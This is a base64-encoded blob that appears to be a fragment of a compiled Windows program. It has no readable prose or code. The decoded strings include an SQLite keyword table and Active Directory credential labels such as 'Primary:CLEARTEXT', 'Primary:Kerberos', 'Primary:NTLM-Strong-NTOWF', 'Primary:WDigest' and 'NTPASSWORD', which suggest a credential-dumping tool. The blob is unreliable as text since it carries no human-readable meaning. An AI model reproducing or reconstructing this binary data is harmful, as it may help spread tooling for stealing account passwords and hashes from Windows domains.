AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6W1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/MDEyMzQ1Njc4OUFCQ0RFRgAHBAYEKAoFIA4FMBMEOBcFARwFAwAAAHwjCoABAAAAAQAAAAAAAACAIwqAAQAAAAEAAAAAAAAAqFIKgAEAAADAUgqAAQAAABBTCoABAAAADAAAAAAAAAAQdgmAAQAAAAAAAAAAAAAACKkEgAEAAADiAAMAXwCKAIoApgAMATMANAAqAGcCZwJzAvcAawJrAjEAMQAyADIAMgAyAJcCMAAwADAAMAAvAC8ALgAuAC4ALQD1ALUCtQLiAC4ALgAuAC0A9QC7ADMANAAqAGcCZwJzAigBawJrAjEAMQAyADIAMgAyAC0BMAAwADAAMAAvAC8ALgAuAC4ALQD1AC8ALwAuAC4ALgAtAPUAOQK2Ak8AXwDiAJwDtQK1AgMCOgIXADMANAAqAGcCZwJzAvUAawJrAjEAMQAyADIAMgAyAEoCMAAwADAAMAAvAC8ALgAuAC4ALQD1AI4AOAILASIBHwEeASwAKQDiABgCGQLIAPkA1QAdATMANAAqAGcCZwJzAjsAawJrAjEAMQAyADIAMgAyABgAMAAwADAAMAAvAC8ALgAuAC4ALQD1AOIADQKxAuwBLAApAAMBMwA0ACoAZwJnAnMC5AFrAmsCMQAxADIAMgAyADIAgQIwADAAMAAwAC8ALwAuAC4ALgAtAPUA4gChAAQB5QGwAvMBtAAzADQAKgBnAmcCcwIIAmsCawIxADEAMgAyADIAMgByAzAAMAAwADAALwAvAC4ALgAuAC0A9QDiADsAqgNxAJYCAQAAATMANAAqAGcCZwJzArAAawJrAjEAMQAyADIAMgAyAOcBMAAwADAAMAAvAC8ALgAuAC4ALQD1AOIAaAJoAnQCIwGnAqgCMwA0ACoAZwJnAnMCOQJrAmsCMQAxADIAMgAyADIAOgIwADAAMAAwAC8ALwAuAC4ALgAtAPUA4gALArECUgLuAKcCqAIzADQAKgBnAmcCcwKTAGsCawIxADEAMgAyADIAMgAtATAAMAAwADAALwAvAC4ALgAuAC0A9QA3AhwCzAHNAc4B5gG7AOIAtgJLAJ8AbAIsACkAMwA0ACoAZwJnAnMCHwBrAmsCMQAxADIAMgAyADIALAEwADAAMAAwAC8ALwAuAC4ALgAtAPUA4gApAQ0BFQEsACkAUQIzACgAKgBnAmcCcwIiAGsCawIxADEAMgAyADIAMgDkADAAMAAwADAALwAvAC4ALgAuAC0A9QDiALQA9ACSAJEAkAAHASoCNAAqAGcCZwJzAn8AawJrAjEAMQAyADIAMgAyAKYCMAAwADAAMAAvAC8ALgAuAC4ALQD1AOIA7wDlAMwAtACSA94B4wCiACoAZwJnAnMCTQJrAmsCMQAxADIAMgAyADIAtAIwADAAMAAwAC8ALwAuAC4ALgAtAPUAJwCpAjUApgLqAK0CrwD8ALEA7gEnAKMANQCmAAwBHgCKADUAgAAQAZcAewDUACYBzwAlAZQAJAAlAB0C+gCiAqICywAmAPYA9gAkACUAtgIOACoCJAAlACYA9gD2ALUCpAAmAPYA9gAyADIAMgAyACsAMAAwADAAMAAvAC8ALgAuAC4ALQD1ADAAMAAwADAALwAvAC4ALgAuAC0A9QA2AKMCpAJeAv4ALwEuAS0A9QBTAnYAFAKyAl4C7wEvAS4BtQJeAlMCLwEuAQ8BoABTAn0AfAC1ANwA2wDaAJoA2ADoAegB1gG3AFgCWAJYAloCCwCiAqIC7QDsALQAWAJYAlgCWgILAFgCWAJYAloCCwAtAbQAMgAyADIAMgDvATAAMAAwADAALwAvAC4ALgAuAC0A9QA5AIwCtgJLAFECXgJPAlkCXgKJAFkCUwKJAjoAUwJ0AKMCpAKOADIByQEiAR8BHgEQAq4ALQFuAKICogKVAgEAHQHiARMCzAApAREBXwBYAlgCWAJYAlgCWAKNArYCSwAeAqICogKiAqICLQGiAqICGgEbALgCuAJpALkAjgLmAA4CLQGTAA0A6QAtAfEALQESAbYCDwAtAQ8CowKkArMAKQEqAeIB+gEIAbYCSwDnAIIAtgJLALYCDwDbAS0BtgIPACQBowKkAqMCpAK8AKMCpAIYAW8A+wETAesAFAKyAoQDlwK2Ag8A0wA7AOEA6AAtAQ8BLAIWASsCLQE7ANIApwAYAhkCLQG2AC0B+AAbAPIAqAAtAa4CtgJDAPcBLQHxAbYCRAAtAfYBLQHkALYCRQC2AkYAywAtARYCtgJHAB0ALQG+ALYCSAAtASgCtgJJALYCPAAtAYgCLQGeAIwAtgI9AC0BWwItAbYCEAAtATECtgI+AC0BIwAtASEAtgJKALYCVQAtARUALQG2AkwAtgJAAC0BtgJNAC0B9QG2Ak4AtgJBAC0BUAItAR8CtgJ4ALYCeQDBAC0BiAK2AnoALQG2AlIALQFbAi0BxwC2AlYAtgJQAAQCLQHNAC0B9AG2AlcALQHOALYCWAAtAbYCVAC2AnUALQEzAlcCLQGJALYCcAC2AmEALQEbAbYCXQCPAC0BtgJZAOMBLQFvALYCWgDdAbYCUQDJAKUA1wAbALYCUwDeAIsCiwK2AkIAEQAjArYCPwCKAooC0wHgAYQC0gE4AI8A+QH4AQQAAAIBAtQBnALdAEcC+wCyAMAAxgB3ACABgQCGAisBhQLzAZ8C0QBMAl4AYgBtABUA/QBEAmUAhwApAoAC/wACAYQAZwDVAYUAaABsAAYBFAE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